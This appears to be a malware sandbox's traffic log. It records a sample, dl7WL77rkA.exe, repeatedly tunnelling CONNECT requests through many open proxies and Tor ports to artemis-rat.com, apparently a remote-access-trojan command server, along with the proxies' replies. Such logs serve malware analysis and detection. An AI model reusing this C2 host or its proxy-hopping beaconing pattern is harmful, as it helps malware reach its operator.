                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            911192.168.2.55247238.54.95.1931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.312521935 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            912192.168.2.55243198.175.31.19541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.323419094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            913192.168.2.55248338.162.31.3131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.323479891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.778393030 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            914192.168.2.55243498.170.57.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.329900026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            915192.168.2.55250938.162.2.19831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.341048002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.780633926 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            916192.168.2.552461181.78.19.2499993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.341085911 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.092415094 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.905277014 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.592744112 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.526220083 CET | 19 | IN | HTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            917192.168.2.552427163.172.158.70163793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.354537964 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.092545986 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.093033075 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.905309916 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.957741022 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            918192.168.2.552540129.213.150.20580803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.365487099 CET | 193 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Mar 11, 2024 03:30:41.581151009 CET | 59 | IN | HTTP/1.1 200 Connection Established
Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            919192.168.2.55198127.65.240.15710803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.367831945 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            920192.168.2.551920192.169.226.96461913876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.368590117 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.405112028 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.405767918 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.405402899 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            921192.168.2.550653125.227.225.15733893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.372380018 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            922192.168.2.552684202.159.107.1374433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.372889042 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            923192.168.2.552685202.159.107.1374433876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.374914885 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            924192.168.2.55242337.235.48.19803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.376137018 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            925192.168.2.552690202.159.107.1374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.376698017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            926192.168.2.55245218.135.133.11631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.378084898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.674093008 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            927192.168.2.552692202.159.107.1374433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.378237009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            928192.168.2.55242643.131.245.216156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.384699106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            929192.168.2.551280107.152.98.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.386919975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            930192.168.2.552425120.78.191.225803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.391228914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.719897032 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.721920967 CET295INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            931192.168.2.55242191.202.230.21980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413666964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            932192.168.2.55247318.185.169.15031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413671970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.717176914 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            933192.168.2.55242043.255.113.23280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413779020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            934192.168.2.552464218.252.244.126803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413836956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.729541063 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            935192.168.2.55243269.230.240.163326503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413837910 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.754379988 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
Mar 11, 2024 03:30:42.105214119 CET628INHTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Server: ADM/2.1.1
Connection: close
Content-Length: 509
<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
Mar 11, 2024 03:30:42.107319117 CET628INHTTP/1.1 403 Forbidden
Content-Type: text/html; charset=utf-8
Server: ADM/2.1.1
Connection: close
Content-Length: 509
<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            936192.168.2.552538192.252.216.8141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413841009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            937192.168.2.551599128.199.251.21980003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413964033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.445987940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.780123949 CET19INHTTP/1.0 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            938192.168.2.552572157.185.157.151265893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.413976908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            939192.168.2.55242945.11.95.16550383876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.414011002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            940192.168.2.55248747.243.177.21080883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.414613962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
